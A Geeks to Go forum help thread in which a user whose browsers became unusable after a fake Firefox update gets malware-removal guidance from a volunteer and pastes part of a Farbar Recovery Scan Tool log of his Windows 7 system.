Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

fake browser update has rendered browsers unusable [Solved]

fake browser update

  • This topic is locked This topic is locked

#1
kenbarber

kenbarber

    Member

  • Member
  • PipPipPip
  • 116 posts

I have a  hp pavilion tower P7-1010 amd atlon x4  6 45  processer 3.7 ghz 6 gb ram, 64 bit processer  running windows  7

Have been using latest version of fire fox, IE. , and Chrome. Note IE has never run great on this pc.

Now, I got what turned out to be a fake update of firefox.  Since getting that the system has slowed down considerable with firefox normally going directly into non-responsive mode as soon as you opened it and never does complete loading the 1stl  url you put in.

Most of the time IE is non responsive but not always. It is however very slow,  I mean you can nap while waiting on it.

Chrome was running reasonably but sometime it goes non-responsive. Las night all 3 browsers would go non-responsive without getting a url in.

All browser loading takes forever.

I may have to communicate with you on a samsug laptop running windows 10, she has chrome and IE on it.

 

Can you help? We are appreciative of any help.

[email protected]                               

ken barber  


  • 0

Advertisements


#2
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hello KenBarber and :welcome:

My name is Bruce1270 and I will be helping you with your malware problem.

A few things before we get started.
  • Please read all instructions carefully. If there is anything you do not understand please ask me first before doing anything.
  • Please be patient. I am a volunteer who does this in my spare time so I will try to get back to you as soon as possible.
  • Please follow all instructions in the order given.
  • Please do not install any other software unless advised. This may hinder the removal process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • Please make sure you reply within 4 days to my responses, if there is no reply within 4 days, the topic will be closed and you will need to request the topic be reopened.


    Important!

    Please save or print off these instructions. Part of this fix may require you to be in safe mode where you will not be able to access the internet or my instructions!

    I would strongly recommend you back up your personal data and folders before we begin.

    Malware removal can be very long, complicated and may take multiple steps. I understand this may be frustrating but please stay with this topic until your machine is declared clean. The results will hopefully be very rewarding. :happy:
    As we go along please tell me how the computer is running now. Please be as descriptive as possible e.g. I'm still getting web redirects, I am unable to access the internet etc.

    OK. Let's move on.

    I need you to run some logs and I'll take a look. :)


    Please download Farbar Recovery Scan Tool and save it to your Desktop.
    Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click on the file and select run as administrator (if you don't have this option just double click the file to run it). When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from (this should be your desktop).
  • Please copy (CTRL + C) and paste (CTRL + V) the FRST.txt log back here.
  • The first time the tool is run it generates another log Addition.txt - also located in the same directory as FRST.exe.
  • Please also paste that along with the FRST.txt into your reply.
    Note: Please do not attach any logs unless specifically requested. It's easier if you simply copy and paste them into your reply. It's OK if you have to use more than one post to do so.

  • 0

#3
kenbarber

kenbarber

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 116 posts
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23-11-2016
Ran by Kenneth (administrator) on KENNETH-HP (23-11-2016 18:30:21)
Running from C:\Users\Kenneth\Downloads
Loaded Profiles: Kenneth (Available Profiles: Kenneth & LogMeInRemoteUser)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Eastman Kodak Company) C:\Program Files (x86)\Kodak\KODAK Share Button App\Listener.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
() C:\Program Files (x86)\Free Desktop Timer\DesktopTimer.exe
(Siber Systems) C:\Program Files (x86)\Siber Systems\AI RoboForm\robotaskbaricon.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\Hp\Digital Imaging\bin\hpqtra08.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
(Paessler AG) C:\Program Files (x86)\PRTG Network Monitor\PRTG Enterprise Console.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
(Prosoftnet) C:\Program Files (x86)\IDriveWindows\id_bglaunch.exe
(Prosoftnet) C:\Program Files (x86)\IDriveWindows\id_tray.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\nis.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Paessler AG) C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Paessler AG) C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe
() C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
(Roxio) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowSvc.exe
(RaMMicHaeL) C:\Program Files (x86)\Unchecky\bin\unchecky_svc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(RaMMicHaeL) C:\Program Files (x86)\Unchecky\bin\unchecky_bg.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\nis.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\Hp\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\Hp\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\conathst.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\nacl64.exe
(Siber Systems Inc.) C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome\rf-chrome-nm-host.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\nacl64.exe
(Prosoftnet) C:\Program Files (x86)\IDriveWindows\id_service.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Farbar) C:\Users\Kenneth\Downloads\FRST64 (1).exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Farbar) C:\Users\Kenneth\Downloads\FRST64 (1).exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2011-09-16] (LogMeIn, Inc.)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-25] (Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-09-09] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54576 2008-12-08] (Hewlett-Packard)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [656920 2011-02-01] (PDF Complete Inc)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [336384 2011-03-09] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LifeCam] => C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe [296520 2014-12-13] (RealNetworks, Inc.)
HKLM-x32\...\Run: [RealDownloader] => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] ()
HKLM-x32\...\Run: [IDrive Background process] => C:\Program Files (x86)\IDriveWindows\id_bglaunch.exe [72736 2016-01-18] (Prosoftnet)
HKLM-x32\...\Run: [IDrive Tray] => C:\Program Files (x86)\IDriveWindows\id_tray.exe [1985056 2016-01-18] (Prosoftnet)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [cdloader] => C:\Users\Kenneth\AppData\Roaming\mjusbsp\cdloader2.exe [51592 2014-07-04] (magicJack L.P.)
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [Facebook Update] => C:\Users\Kenneth\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2012-07-11] (Facebook Inc.)
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1095000 2013-12-30] (Garmin Ltd or its subsidiaries)
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [FreeDesktopTimer] => C:\Program Files (x86)\Free Desktop Timer\DesktopTimer.exe [623616 2013-01-26] ()
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [KGShareApp] => C:\Program Files (x86)\Kodak\KODAK Share Button App\KGShare_App.exe [394752 2012-06-26] (Eastman Kodak Company)
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [RoboForm] => C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [110376 2016-09-02] (Siber Systems)
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-10-05] (Apple Inc.)
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [**zbhuduql<*>] => "C:\Users\Kenneth\AppData\Local\0de59\12445.23cd59" <===== ATTENTION (Value Name with invalid characters)
AppInit_DLLs-x32: c:\progra~2\amazon\amazon~1\\amazon~3.dll => No File
ShellIconOverlayIdentifiers: [  0001IDSIcon1] -> {0FA6DCC0-CF0B-427D-A8AF-97C466AB5769} => C:\Program Files (x86)\IDriveWindows\IDSyncIntIcon64.dll [2015-11-25] (Pro-Softnet Corporation, U.S.A)
ShellIconOverlayIdentifiers: [  0001IDSIcon2] -> {66357BBE-D2E5-453C-95FF-8102EB32419D} => C:\Program Files (x86)\IDriveWindows\IDSyncIntIcon64.dll [2015-11-25] (Pro-Softnet Corporation, U.S.A)
ShellIconOverlayIdentifiers: [  0001IDSIcon3] -> {904E6336-8B13-43FA-B4C3-5B62C1C91971} => C:\Program Files (x86)\IDriveWindows\IDSyncIntIcon64.dll [2015-11-25] (Pro-Softnet Corporation, U.S.A)
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.8.1.14\buShell.dll [2016-11-11] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.8.1.14\buShell.dll [2016-11-11] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.8.1.14\buShell.dll [2016-11-11] (Symantec Corporation)
ShellIconOverlayIdentifiers: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} =>  No File
ShellIconOverlayIdentifiers: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} =>  No File
ShellIconOverlayIdentifiers: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} =>  No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} =>  No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} =>  No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2011-08-11]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\Hp\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2016-11-01]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe (McAfee, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealPlayer Cloud Service UI.lnk [2014-12-13]
ShortcutTarget: RealPlayer Cloud Service UI.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe (RealNetworks, Inc.)
Startup: C:\Users\Kenneth\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk [2015-02-09]
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Kenneth\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PRTG Enterprise Console.lnk [2013-03-28]
ShortcutTarget: PRTG Enterprise Console.lnk -> C:\Program Files (x86)\PRTG Network Monitor\PRTG Enterprise Console.exe (Paessler AG)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:47574
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 24.116.0.53 24.116.2.50
Tcpip\..\Interfaces\{F52047E5-D6C8-4EA2-B649-DF266EDC869F}: [DhcpNameServer] 24.116.0.53 24.116.2.50
 
Internet Explorer:
==================
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/
SearchScopes: HKLM -> {4313FCE4-FD2A-4C18-BB96-4E96F99B196B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://shop.ebay.com/?_nkw={searchTerms}
SearchScopes: HKLM-x32 -> {4313FCE4-FD2A-4C18-BB96-4E96F99B196B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://shop.ebay.com/?_nkw={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {4313FCE4-FD2A-4C18-BB96-4E96F99B196B} URL = 
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {587255F6-09F0-4E93-B935-D9A85592C40F} URL = 
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {85A60A59-D3D8-468F-B598-FB4393789EF4} URL = hxxps://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NS&chn=oem&geo=US&ver=22&locale=en_US&guid=A10A44A7-C444-11E0-A5CF-2C27D732C84B&doi=2016-09-01&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {C10EE16A-FC46-4276-B095-F5DF08F579D4} URL = hxxps://www.mypoints.com/emp/u/mysearch.vm?st=mypWeb&fctb.tb=1&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://shop.ebay.com/?_nkw={searchTerms}
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll [2014-03-11] (Microsoft Corporation.)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealDownloader)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine64\22.8.1.14\coIEPlg.dll [2016-11-11] (Symantec Corporation)
BHO: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll [2016-09-02] (Siber Systems Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll [2009-09-23] (Hewlett-Packard Co.)
BHO-x32: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll [2014-03-11] (Microsoft Corporation.)
BHO-x32: Mob Wars Toolbar BHO -> {28A27F58-704F-40E1-8053-28E909FBF604} -> C:\Program Files (x86)\Mob Wars Toolbar\Toolbar.dll [2011-10-05] ()
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealDownloader)
BHO-x32: No Name -> {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} -> No File
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\coIEPlg.dll [2016-11-11] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll [2016-09-02] (Siber Systems Inc.)
BHO-x32: No Name -> {89867A4A-BDEE-4259-964A-B8E87C4892F3} -> No File
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-26] (Google Inc.)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO-x32: MyPoints Toolbar BHO -> {B0E42C7C-F949-2C54-2944-6642CF94AB20} -> C:\Program Files (x86)\MyPoints Toolbar\Toolbar.dll [2013-09-09] ()
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: No Name -> {D473AEB7-C242-4b00-ABDB-4A6F8D76889E} -> No File
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2012-07-09] (Hewlett-Packard)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2009-09-23] (Hewlett-Packard Co.)
Toolbar: HKLM - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll [2016-09-02] (Siber Systems Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.8.1.14\coIEPlg.dll [2016-11-11] (Symantec Corporation)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll [2014-03-11] (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
Toolbar: HKLM-x32 - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll [2016-09-02] (Siber Systems Inc.)
Toolbar: HKLM-x32 - Mob Wars Toolbar - {6857857C-15D3-435D-AF19-E0217298B416} - C:\Program Files (x86)\Mob Wars Toolbar\Toolbar.dll [2011-10-05] ()
Toolbar: HKLM-x32 - MyPoints Toolbar - {0B9F58EF-90CC-2474-09B9-80B8E9DD43CA} - C:\Program Files (x86)\MyPoints Toolbar\Toolbar.dll [2013-09-09] ()
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\coIEPlg.dll [2016-11-11] (Symantec Corporation)
Toolbar: HKLM-x32 - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll [2014-03-11] (Microsoft Corporation.)
Toolbar: HKLM-x32 - No Name - {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} -  No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> &RoboForm Toolbar - {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll [2016-09-02] (Siber Systems Inc.)
